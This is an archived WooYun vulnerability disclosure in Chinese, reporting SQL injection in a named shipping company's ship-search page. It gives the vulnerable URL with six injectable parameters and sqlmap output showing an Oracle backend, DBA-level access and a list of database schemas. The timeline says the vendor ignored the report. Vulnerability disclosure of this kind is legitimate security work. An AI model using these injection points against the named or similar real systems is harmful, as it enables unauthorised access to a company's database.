乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-18: 厂商已经主动忽略漏洞,细节向公众公开
rt
在查询机票的地方
http://ejj.jjshipping.cn/eservices/shipsearch.jsp?startcon=CN&startPort=CNDLC&beginDate=2015-07-01&endDate=2015-07-31&endcon=CN&endPort=CNDLC
好可怕,辣么多参数,都可以注入
there were multiple injection points, please select the one to use for followi injections:[0] place: GET, parameter: startcon, type: Single quoted string (default)[1] place: GET, parameter: startPort, type: Single quoted string[2] place: GET, parameter: beginDate, type: Single quoted string[3] place: GET, parameter: endDate, type: Single quoted string[4] place: GET, parameter: endcon, type: Single quoted string[5] place: GET, parameter: endPort, type: Single quoted string[q] Quit>[14:57:23] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[14:57:23] [INFO] fetching current usercurrent user: 'LSP_SHJJHY'
dba权限
[15:01:20] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[15:01:20] [INFO] testing if current user is DBAcurrent user is DBA: 'True'
available databases [23][*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] JJOA[*] JJWEB[*] LSP_SHJJHY[*] MDSYS[*] NC57[*] NC57TEST[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SAMIS45QD[*] SAMIS_JC[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TEST[*] TSMSYS[*] WMSYS[*] XDB
未能联系到厂商或者厂商积极拒绝